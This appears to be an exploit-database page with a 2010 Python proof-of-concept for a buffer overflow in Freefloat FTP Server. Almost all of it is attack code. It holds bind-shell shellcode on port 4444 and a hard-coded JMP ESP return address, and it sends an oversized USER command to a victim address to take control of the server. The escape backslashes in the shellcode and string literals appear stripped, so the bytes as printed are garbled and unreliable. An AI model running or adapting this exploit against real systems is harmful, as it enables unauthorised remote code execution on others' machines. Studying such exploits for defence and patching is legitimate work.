Freefloat FTP Server Buffer Overflow Vulnerability 0day

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Freefloat FTP Server Buffer Overflow Vulnerability 0day
# Published : 2010-12-05
# Author : 0v3r
# Previous Title : J-Integra v2.11 Remote Code Execution Exploit
# Next Title : Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow

# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import socket
import sys

def usage():

        print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
        print "example: ./freefloatftp.py 192.168.1.100 21"

#Bind Shell shellcode port 4444
shellcode = ("x31xc9xdbxcdxbbxb3x93x96x9dxb1x56xd9x74x24xf4"
"x5ax31x5ax17x83xeaxfcx03x5ax13x51x66x6ax75x1c"
"x89x93x86x7ex03x76xb7xacx77xf2xeax60xf3x56x07"
"x0bx51x43x9cx79x7ex64x15x37x58x4bxa6xf6x64x07"
"x64x99x18x5axb9x79x20x95xccx78x65xc8x3fx28x3e"
"x86x92xdcx4bxdax2exddx9bx50x0exa5x9exa7xfbx1f"
"xa0xf7x54x14xeaxefxdfx72xcbx0ex33x61x37x58x38"
"x51xc3x5bxe8xa8x2cx6axd4x66x13x42xd9x77x53x65"
"x02x02xafx95xbfx14x74xe7x1bx91x69x4fxefx01x4a"
"x71x3cxd7x19x7dx89x9cx46x62x0cx71xfdx9ex85x74"
"xd2x16xddx52xf6x73x85xfbxafxd9x68x04xafx86xd5"
"xa0xbbx25x01xd2xe1x21xe6xe8x19xb2x60x7bx69x80"
"x2fxd7xe5xa8xb8xf1xf2xcfx92x45x6cx2ex1dxb5xa4"
"xf5x49xe5xdexdcxf1x6ex1fxe0x27x20x4fx4ex98x80"
"x3fx2ex48x68x2axa1xb7x88x55x6bxcex8fx9bx4fx82"
"x67xdex6fx34x2bx57x89x5cxc3x31x01xc9x21x66x9a"
"x6ex5ax4cxb6x27xccxd8xd0xf0xf3xd8xf6x52x58x70"
"x91x20xb2x45x80x36x9fxedxcbx0ex77x67xa2xddxe6"
"x78xefxb6x8bxebx74x47xc2x17x23x10x83xe6x3axf4"
"x39x50x95xebxc0x04xdexa8x1exf5xe1x31xd3x41xc6"
"x21x2dx49x42x16xe1x1cx1cxc0x47xf7xeexbax11xa4"
"xb8x2axe4x86x7ax2dxe9xc2x0cxd1x5bxbbx48xedx53"
"x2bx5dx96x8excbxa2x4dx0bxfbxe8xccx3dx94xb4x84"
"x7cxf9x46x73x42x04xc5x76x3axf3xd5xf2x3fxbfx51"
"xeex4dxd0x37x10xe2xd1x1dx1a")


junk1  = "x41" * 230
eip    = "x53x93x42x7E"  #7E429353 JMP ESP
nops   = "x90" * 16
junk2  = "x43" * (1000 - len(junk1 + eip + nops + shellcode))

buff   = junk1 + eip + nops + shellcode + junk2 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "n"	
print "----------------------------------------------------------------"
print "|      Freefloat FTP Server Buffer Overflow Vulnerability      |"
print "----------------------------------------------------------------"
print "n"


if len(sys.argv) != 3:
	usage()
        sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

try:
	print("[-] Connecting to " + ip + " on port " + port + "n")
	s.connect((ip,int(port)))
	data = s.recv(1024)
	print("[-] Sending exploit...")
	s.send('USER ' + buff + 'rn')
	s.close()
	print("[-] Exploit successfully sent...")
	print("[-] Connect to " + ip + " on port 4444")
except:
	print("[-] Connection error...")
	print("[-] Check if victim is up.")